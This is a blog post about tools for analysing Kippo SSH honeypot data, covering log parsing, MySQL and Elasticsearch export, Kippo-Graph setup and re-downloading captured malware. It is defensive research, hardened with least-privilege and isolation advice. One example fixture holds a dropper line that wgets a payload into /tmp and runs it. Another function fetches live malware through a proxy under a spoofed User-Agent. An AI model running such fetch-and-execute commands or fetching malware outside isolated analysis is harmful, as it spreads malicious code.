Division Zero (Div0). Copyright © 2011-2018

All rights reserved.

Ion’s (BruteForce Lab’s) Contributions to Kippo

Note: This is an add-on post on top of my Kippo write-up.

 

Kippo-Graph was only a small section of my previous Kippo write-up, but I thought I should dedicate an entire post to the contributions my dear friend Ioannis "Ion" Koniaris has made to the Kippo ecosystem, together with my updated write-up.

 

Kippo2MySQL

Kippo2MySQL is a small script that extracts some very basic statistics from Kippo's text-based log files and inserts them into a MySQL database.

My setup already has Kippo's own MySQL logging enabled. Nonetheless, you can still use this script to extract some very basic data from Kippo's text-based log files and insert it into a MySQL database, for instance for logs written before MySQL logging was switched on.
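
As an added example (my own code, not Kippo2MySQL's), here is the kind of extraction that script performs: parsing Kippo's twistd-style log lines for login attempts, computing the basic counts, and inserting the rows with a parameterised query. The log lines below are constructed to match Kippo's "login attempt [user/password] failed|succeeded" format as I recall it and are not real traffic; an in-memory SQLite table stands in for MySQL (with MySQLdb the placeholder is %s rather than ?). The one thing worth noticing is that the username and password are attacker-chosen strings, so a homegrown log-to-database script must bind them as parameters rather than splice them into the SQL text.

```python
import re
import sqlite3
from collections import Counter
from datetime import datetime

# Constructed lines in the shape of Kippo's twistd log (not real traffic). Only the
# "login attempt" lines carry credentials; the other lines are there to be skipped.
SAMPLE_LOG = """\
2014-05-03 10:12:31+0000 [kippo.core.ssh.HoneyPotSSHFactory] New connection: 203.0.113.5:51234 (192.168.60.12:2222) [session: 3]
2014-05-03 10:12:33+0000 [SSHService ssh-userauth on HoneyPotTransport,3,203.0.113.5] login attempt [root/123456] failed
2014-05-03 10:12:35+0000 [SSHService ssh-userauth on HoneyPotTransport,3,203.0.113.5] login attempt [root/toor] failed
2014-05-03 10:12:37+0000 [SSHService ssh-userauth on HoneyPotTransport,3,203.0.113.5] login attempt [root/password] succeeded
2014-05-03 10:13:02+0000 [SSHService ssh-userauth on HoneyPotTransport,4,198.51.100.7] login attempt [admin/admin] failed
2014-05-03 10:13:04+0000 [SSHService ssh-userauth on HoneyPotTransport,4,198.51.100.7] login attempt [admin/ad min/x] failed
2014-05-03 10:13:09+0000 [HoneyPotTransport,4,198.51.100.7] connection lost
"""

# The username is taken up to the first '/', the password greedily up to the final
# '] failed' / '] succeeded', so passwords containing '/' or spaces survive intact.
LOGIN_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}[+-]\d{4}) "
    r"\[SSHService ssh-userauth on HoneyPotTransport,(?P<session>\d+),(?P<ip>[0-9a-fA-F.:]+)\] "
    r"login attempt \[(?P<user>[^/]*)/(?P<password>.*)\] (?P<result>failed|succeeded)$"
)


def parse_login_attempts(lines):
    """Yield one dict per login-attempt line; every other line is skipped."""
    for line in lines:
        m = LOGIN_RE.match(line.rstrip("\n"))
        if not m:
            continue
        d = m.groupdict()
        d["session"] = int(d["session"])
        d["success"] = d.pop("result") == "succeeded"
        d["ts"] = datetime.strptime(d["ts"], "%Y-%m-%d %H:%M:%S%z")
        yield d


def summarise(attempts):
    """The 'very basic stats': totals, successes, top usernames, passwords and sources."""
    attempts = list(attempts)
    return {
        "total": len(attempts),
        "successes": sum(a["success"] for a in attempts),
        "top_users": Counter(a["user"] for a in attempts).most_common(5),
        "top_passwords": Counter(a["password"] for a in attempts).most_common(5),
        "top_sources": Counter(a["ip"] for a in attempts).most_common(5),
    }


def load_into_db(attempts, conn=None):
    """Insert the attempts with a parameterised query and return the row count.
    Usernames and passwords are attacker-controlled, so they are bound as
    parameters, never formatted into the SQL string."""
    if conn is None:
        conn = sqlite3.connect(":memory:")  # stand-in for the MySQL connection
    conn.execute("CREATE TABLE IF NOT EXISTS auth (session INTEGER, timestamp TEXT, ip TEXT, "
                 "username TEXT, password TEXT, success INTEGER)")
    conn.executemany(
        "INSERT INTO auth (session, timestamp, ip, username, password, success) "
        "VALUES (?, ?, ?, ?, ?, ?)",
        [(a["session"], a["ts"].isoformat(), a["ip"], a["user"], a["password"], int(a["success"]))
         for a in attempts])
    conn.commit()
    return conn.execute("SELECT COUNT(*) FROM auth").fetchone()[0]


if __name__ == "__main__":
    parsed = list(parse_login_attempts(SAMPLE_LOG.splitlines()))
    print(summarise(parsed))
    print("rows inserted:", load_into_db(parsed))
```

On a real honeypot you would feed `parse_login_attempts` the lines of every `kippo.log*` file in the log directory rather than the constructed sample.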

 

My Network Setup

So as not to pile more onto my Kippo machine, I have a dedicated machine for analytics work, e.g. assessing and analysing the logs.

Note: Do not take this as a recommended Kippo setup; it is only there to show that not everything has to be lumped onto one machine.

On your Kippo machine:

Make sure MySQL listens only on the interface facing the analytics machine (bind-address in my.cnf) and firewall port 3306 to the analyst's address; a honeypot is the last host you want advertising a database to the internet. Then grant your analyst(s) the least they need: Ion's scripts only read the data, so SELECT plus CREATE TEMPORARY TABLES on the kippo database is enough. In the commands below, 192.168.60.12 is the Kippo machine and 192.168.60.10 the analytics machine. On MySQL 8 and later, GRANT no longer accepts an IDENTIFIED BY clause, so create the account with CREATE USER first and then GRANT without it.

$ mysql -h 192.168.60.12 -u root -p

mysql> GRANT SELECT ON kippo.* TO '<analyst username>'@'192.168.60.10' IDENTIFIED BY '<password>';

mysql> GRANT CREATE TEMPORARY TABLES ON kippo.* TO '<analyst username>'@'192.168.60.10' IDENTIFIED BY '<password>';

mysql> SHOW GRANTS FOR '<analyst username>'@'192.168.60.10';

 

On your analytics machine, make sure you can access the database:

$ mysql -h 192.168.60.12 -u <analyst username> -p

 

Now, with the analytics machine set up, install the packages that Ion's scripts need before proceeding:

$ sudo apt-get install python-dev mysql-client libmysqlclient-dev python-pip

 

Kippo-Malware

Kippo-Malware is a Python script that downloads every malicious file whose URL is stored in your Kippo MySQL database. This is useful in situations where, for example, you lost the files or something happened to your Kippo machine, but the database is still intact.

It is also useful in a setup like mine, where the analytics machine has access only to the Kippo database and not to the files in the honeypot's dl/ directory.

 

Get the required Python packages:

$ sudo pip install mysql-python pony requests clint

 

Get a copy of Kippo-Malware:

$ git clone https://github.com/ikoniaris/kippo-malware

 

To run Kippo-Malware:

$ python kippo-malware.py -h

$ python kippo-malware.py -H 192.168.60.12 -u <analyst username> -p <password> --debug

Note that a password given on the command line ends up in your shell history and is visible to every local user through ps while the script runs; on a shared analytics box, use a dedicated read-only database account for it and clear or disable history for that session.

The script also supports fetching through an HTTP proxy, so that the malicious servers see the proxy's address rather than your own, and a custom User-Agent value. The proxy only hides where you are: what comes back is still live malware, so keep the output directory on an isolated machine and never execute the files there. Remember too that the database stores the URL and the original filename, not a hash of the content, so what a server hands you today may differ from what it served during the session; treat re-downloaded files as fresh samples rather than as the originals.
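
As an added example (my own code, not Kippo-Malware's), the core of such a re-download loop with the failure modes handled: each distinct URL is fetched once, non-HTTP schemes from the database are refused (a row must never aim the fetcher at file:// or ftp://), dead hosts and oversized responses are reported rather than crashing the run, and what is saved is named by its SHA-256 and stored without an execute bit. The rows are constructed in the shape of Kippo's downloads table (session, url, outfile; the column names are my assumption), and the canned fetcher stands in for the network so the example runs offline; make_fetcher() is the live version with proxy and User-Agent support.

```python
import hashlib
import os
import tempfile
import urllib.request
from urllib.parse import urlsplit

MAX_BYTES = 16 * 1024 * 1024   # stop reading past this; a hostile server can stream forever

# Constructed rows in the shape of Kippo's downloads table (session, url, outfile); the
# column names are assumed. The same URL appears twice and one row carries a non-HTTP scheme.
SAMPLE_ROWS = [
    (3, "http://203.0.113.5/x.sh", "dl/20140503101240_http___203_0_113_5_x_sh"),
    (3, "http://203.0.113.5/x.sh", "dl/20140503101301_http___203_0_113_5_x_sh"),
    (4, "file:///etc/passwd", "dl/20140503101305_file_____etc_passwd"),
    (5, "http://198.51.100.7/bot", "dl/20140503102000_http___198_51_100_7_bot"),
]


def make_fetcher(proxy=None, user_agent="Wget/1.14 (linux-gnu)", timeout=20):
    """Return fetch(url) -> bytes. With proxy set (e.g. 'http://127.0.0.1:8080') the malware
    server sees the proxy's address, not the analyst's. The User-Agent mimics the tool the
    attacker's own command would have used, so a server that fingerprints clients still answers."""
    handlers = [urllib.request.ProxyHandler({"http": proxy, "https": proxy})] if proxy else []
    opener = urllib.request.build_opener(*handlers)

    def fetch(url):
        req = urllib.request.Request(url, headers={"User-Agent": user_agent})
        with opener.open(req, timeout=timeout) as resp:
            return resp.read(MAX_BYTES + 1)   # one byte over the cap is enough to detect it
    return fetch


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def refetch(rows, outdir, fetch):
    """Fetch each distinct URL once and store the bytes under their SHA-256, read-only.
    Returns {url: sha256 | 'skipped: ...' | 'error: ...'} so nothing fails silently."""
    os.makedirs(outdir, exist_ok=True)
    report = {}
    for _session, url, _outfile in rows:
        if url in report:
            continue                                     # same URL logged in several sessions
        scheme = urlsplit(url).scheme.lower()
        if scheme not in ("http", "https"):
            report[url] = "skipped: scheme %r" % scheme  # never let a DB row pick file:// or ftp://
            continue
        try:
            data = fetch(url)
        except Exception as exc:                         # DNS failure, timeout, 404: hosts vanish
            report[url] = "error: %s" % exc
            continue
        if len(data) > MAX_BYTES:
            report[url] = "skipped: larger than %d bytes" % MAX_BYTES
            continue
        digest = sha256_hex(data)
        path = os.path.join(outdir, digest)
        if not os.path.exists(path):
            with open(path, "wb") as fh:
                fh.write(data)
            os.chmod(path, 0o400)                        # read-only, not executable: live malware
        report[url] = digest
    return report


# Constructed response used by the offline stand-in fetcher below.
CANNED_SCRIPT = b"#!/bin/sh\nwget http://203.0.113.5/bot -O /tmp/bot && sh /tmp/bot\n"


def canned_fetch(url):
    """Offline stand-in for make_fetcher() so the example runs without touching the network."""
    if url.endswith("/bot"):
        raise OSError("timed out")
    return CANNED_SCRIPT


def demo():
    return refetch(SAMPLE_ROWS, tempfile.mkdtemp(prefix="kippo-refetch-"), canned_fetch)


if __name__ == "__main__":
    for url, result in demo().items():
        print(url, "->", result)
    # Live use: refetch(rows_from_db, "refetched", make_fetcher(proxy="http://127.0.0.1:8080"))
```

The rows for a live run come from `SELECT session, url, outfile FROM downloads` on the analyst account; the report dict is what you keep alongside the samples, since it records which URLs were already dead when you tried.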

 

Kippo-Graph

Kippo-Graph is a full-featured PHP web application that visualises statistics from a Kippo honeypot.

 

Get the software Kippo-Graph needs:

$ sudo apt-get install libapache2-mod-php5 php5-mysql php5-gd php5-curl

 

Restart Apache so that it picks up the PHP modules:

$ sudo /etc/init.d/apache2 restart

 

Get Kippo-Graph up and running:

$ cd /var/www/html

$ sudo git clone https://github.com/ikoniaris/kippo-graph

$ cd kippo-graph

$ sudo chown -R www-data:www-data generated-graphs

$ sudo cp config.php.dist config.php

$ sudo vi config.php

Because the clone was made as root, the web server needs ownership of generated-graphs (the directory Kippo-Graph writes its chart images to) in order to write there; handing it to www-data does the job without the chmod 777 that is often suggested, which would let any local user drop files into a directory Apache serves. Edit config.php so that it points at the correct database host and name, with the analyst credentials created earlier. config.php now holds a database password, so restrict it to root and the web server user (for example owner root, group www-data, mode 640).

Browse to http://<your-web-server>/kippo-graph, and there you have it! Keep the page reachable only from your analyst network or behind authentication: it renders attacker-supplied usernames, passwords and commands, and the database credentials sit behind it.

 

Kippo2ElasticSearch

Kippo2ElasticSearch is a Python script that can be used to transfer data from a Kippo MySQL dataset to an Elasticsearch instance.

 

Get the necessary packages:

$ sudo apt-get install libgeoip-dev

$ sudo pip install geoip pony pyes

 

Get a copy of Kippo2ElasticSearch:

$ git clone https://github.com/ikoniaris/kippo2elasticsearch

 

Edit kippo2elasticsearch.py to match your environment (the database host and credentials, and the Elasticsearch host), make sure Elasticsearch is up and running, and then run the script:

$ python kippo2elasticsearch.py

If you examine the script, you will see that it simply takes the result of the following MySQL query and indexes each row into an Elasticsearch instance:

SELECT auth.*, sessions.ip, clients.version, sensors.ip
FROM auth
INNER JOIN sessions ON auth.session = sessions.id
INNER JOIN clients ON sessions.client = clients.id
INNER JOIN sensors ON sessions.sensor = sensors.id;

Two things to keep in mind if you rework this: the result set has two columns named ip (the attacker's source address from sessions and the honeypot's own from sensors), so alias them before turning rows into documents, and the INNER JOINs drop any auth row whose session, client or sensor row is missing, so compare the document count in Elasticsearch against SELECT COUNT(*) FROM auth before trusting the numbers.
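
As an added example (my own code, not Kippo2ElasticSearch's), the same join run against a constructed, Kippo-shaped SQLite copy of the four tables, with the two ip columns aliased apart, each row turned into a document, and the documents packed into the newline-delimited body that Elasticsearch's _bulk endpoint accepts. It also counts the auth rows that the INNER JOIN silently discards when their session row is gone. Columns beyond those the query touches (starttime, endtime) and the sample rows are my assumptions, not real honeypot data; send_bulk() is the only part that touches the network and is not exercised offline.

```python
import json
import sqlite3
import urllib.request

# Kippo-shaped tables; columns beyond those the query uses are assumptions.
SCHEMA = """
CREATE TABLE sensors  (id INTEGER PRIMARY KEY, ip TEXT);
CREATE TABLE clients  (id INTEGER PRIMARY KEY, version TEXT);
CREATE TABLE sessions (id TEXT PRIMARY KEY, starttime TEXT, endtime TEXT,
                       sensor INTEGER, ip TEXT, client INTEGER);
CREATE TABLE auth     (id INTEGER PRIMARY KEY, session TEXT, success INTEGER,
                       username TEXT, password TEXT, timestamp TEXT);
"""

# Constructed rows, not real traffic. The last auth row points at a session that no
# longer exists (e.g. sessions were purged) to show what the INNER JOIN does with it.
SAMPLE_ROWS = {
    "sensors": [(1, "192.168.60.12")],
    "clients": [(1, "SSH-2.0-libssh2_1.4.3"), (2, "SSH-2.0-PuTTY_Release_0.63")],
    "sessions": [
        ("a1b2", "2014-05-03 10:12:31", "2014-05-03 10:14:02", 1, "203.0.113.5", 1),
        ("c3d4", "2014-05-03 10:13:02", "2014-05-03 10:13:09", 1, "198.51.100.7", 2),
    ],
    "auth": [
        (1, "a1b2", 0, "root", "123456", "2014-05-03 10:12:33"),
        (2, "a1b2", 1, "root", "password", "2014-05-03 10:12:37"),
        (3, "c3d4", 0, "admin", "admin", "2014-05-03 10:13:04"),
        (4, "zzzz", 0, "oracle", "oracle", "2014-05-03 10:20:00"),
    ],
}

# The join from the post, with the two ip columns given distinct names so neither
# overwrites the other once a row becomes a dict. ORDER BY keeps the output deterministic.
QUERY = """
SELECT auth.id, auth.session, auth.success, auth.username, auth.password, auth.timestamp,
       sessions.ip AS src_ip, clients.version AS client_version, sensors.ip AS sensor_ip
FROM auth
INNER JOIN sessions ON auth.session = sessions.id
INNER JOIN clients  ON sessions.client = clients.id
INNER JOIN sensors  ON sessions.sensor = sensors.id
ORDER BY auth.id
"""


def load_sample_db():
    """In-memory SQLite stand-in for the Kippo MySQL database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    for table, rows in SAMPLE_ROWS.items():
        marks = ",".join("?" * len(rows[0]))
        conn.executemany("INSERT INTO %s VALUES (%s)" % (table, marks), rows)
    conn.commit()
    return conn


def rows_to_docs(conn):
    """Run the join and turn each row into an Elasticsearch document."""
    conn.row_factory = sqlite3.Row
    docs = []
    for row in conn.execute(QUERY):
        doc = dict(row)
        doc["success"] = bool(doc["success"])
        # Kippo stores 'YYYY-MM-DD HH:MM:SS'; Elasticsearch's default date format wants a 'T'.
        doc["@timestamp"] = doc.pop("timestamp").replace(" ", "T")
        docs.append(doc)
    return docs


def count_dropped(conn):
    """auth rows the INNER JOIN discards because their session row is missing."""
    return conn.execute(
        "SELECT COUNT(*) FROM auth LEFT JOIN sessions ON auth.session = sessions.id "
        "WHERE sessions.id IS NULL").fetchone()[0]


def bulk_body(docs, index="kippo"):
    """NDJSON for POST /_bulk: an action line then a document line per doc, trailing newline
    required. auth.id is reused as _id so re-running the export overwrites, not duplicates."""
    lines = []
    for doc in docs:
        lines.append(json.dumps({"index": {"_index": index, "_id": str(doc["id"])}}))
        lines.append(json.dumps(doc))
    return "\n".join(lines) + "\n"


def send_bulk(body, es_url="http://127.0.0.1:9200"):
    """Ship the body to Elasticsearch (network; not exercised offline)."""
    req = urllib.request.Request(es_url + "/_bulk", data=body.encode(),
                                 headers={"Content-Type": "application/x-ndjson"})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.loads(resp.read())


if __name__ == "__main__":
    conn = load_sample_db()
    docs = rows_to_docs(conn)
    print("%d documents, %d auth rows dropped by the join" % (len(docs), count_dropped(conn)))
    print(bulk_body(docs))
```

Against the real database you would replace load_sample_db() with a MySQLdb connection and run the same QUERY; the dropped-row count is the check to run whenever the Kibana totals look lower than the auth table.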

 

With your dataset in Elasticsearch, you can visualise statistics with Kibana. Bind both Elasticsearch and Kibana to the analyst network only: they ship without authentication unless you configure it, and the index now holds every credential attackers tried against you.

I learned Elasticsearch and Kibana from scratch in order to play with this. It is easy to get the basics right; you just need to dedicate a bit of time. Elastic provides many comprehensive guides: https://www.elastic.co/guide/index.html.
